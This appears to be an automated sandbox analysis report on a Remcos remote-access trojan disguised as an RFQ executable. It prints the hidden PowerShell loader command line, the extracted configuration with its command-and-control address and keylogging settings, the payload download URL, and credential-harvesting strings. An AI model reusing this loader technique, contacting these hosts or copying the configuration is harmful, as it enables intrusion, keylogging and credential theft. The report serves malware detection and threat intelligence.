Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ NO 65-58003.exe

Overview

General Information

Sample name:RFQ NO 65-58003.exe
Analysis ID:1577287
MD5:e4e7b853e87922ff59bcae3527b206f9
SHA1:15e8dc7771a5b9ebeae4b64ccc20a8d9798158c2
SHA256:b4b7eab942bf5ffa93bef1444c82b059d3c18234bcec49df9ec2294bf0ec66bd
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ NO 65-58003.exe (PID: 2448 cmdline: "C:\Users\user\Desktop\RFQ NO 65-58003.exe" MD5: E4E7B853E87922FF59BCAE3527B206F9)
    • powershell.exe (PID: 5272 cmdline: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 4552 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5192 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 2196 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5680 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6488 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 6644 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 4060 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 9 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 212.162.149.92, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4552, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49868
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish), CommandLine: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ NO 65-58003.exe", ParentImage: C:\Users\user\Desktop\RFQ NO 65-58003.exe, ParentProcessId: 2448, ParentProcessName: RFQ NO 65-58003.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish), ProcessId: 5272, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4060, ProcessName: svchost.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4552, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T11:05:16.487668+010020365941Malware Command and Control Activity Detected192.168.2.649874212.162.149.912404TCP
              2024-12-18T11:05:18.671683+010020365941Malware Command and Control Activity Detected192.168.2.649880212.162.149.912404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T11:05:18.878131+010028033043Unknown Traffic192.168.2.649881178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-18T11:05:13.562414+010028032702Potentially Bad Traffic192.168.2.649868212.162.149.9280TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://212.162.149.92/FbuhjxbSFSc116.binAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["212.162.149.91:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HSAM04", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: RFQ NO 65-58003.exeVirustotal: Detection: 13%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4552, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Source: RFQ NO 65-58003.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: RFQ NO 65-58003.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
              Source: C:\Users\user\Desktop\RFQ NO 65-58003.exeCode function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_212010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_212010F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_21206580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,14_2_21206580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0040AE51 FindFirstFileW,FindNextFileW,17_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49874 -> 212.162.149.91:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49880 -> 212.162.149.91:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 212.162.149.91
              Source: global trafficTCP traffic: 192.168.2.6:49874 -> 212.162.149.91:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49881 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49868 -> 212.162.149.92:80
              Source: global trafficHTTP traffic detected: GET /FbuhjxbSFSc116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.92Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.92
              Source: global trafficHTTP traffic detected: GET /FbuhjxbSFSc116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.92Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000011.00000002.2923731406.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.2922976948.00000000030CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000011.00000002.2923731406.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.2922976948.00000000030CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: msiexec.exe, 0000000E.00000002.3407952469.0000000021650000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000E.00000002.3407952469.0000000021650000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3407202116.0000000020880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.92/FbuhjxbSFSc116.bin
              Source: msiexec.exe, 0000000E.00000002.3394879441.000000000568A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.92/FbuhjxbSFSc116.binR
              Source: bhv2FCF.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv2FCF.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: svchost.exe, 0000000D.00000002.3394216616.000002B99EE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: bhv2FCF.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2FCF.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv2FCF.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2893965599.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2894834222.0000000005709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphyq
              Source: msiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: RFQ NO 65-58003.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv2FCF.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
              Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: msiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 00000011.00000002.2923342242.0000000002C74000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000000D.00000003.2526974098.000002B99ED30000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
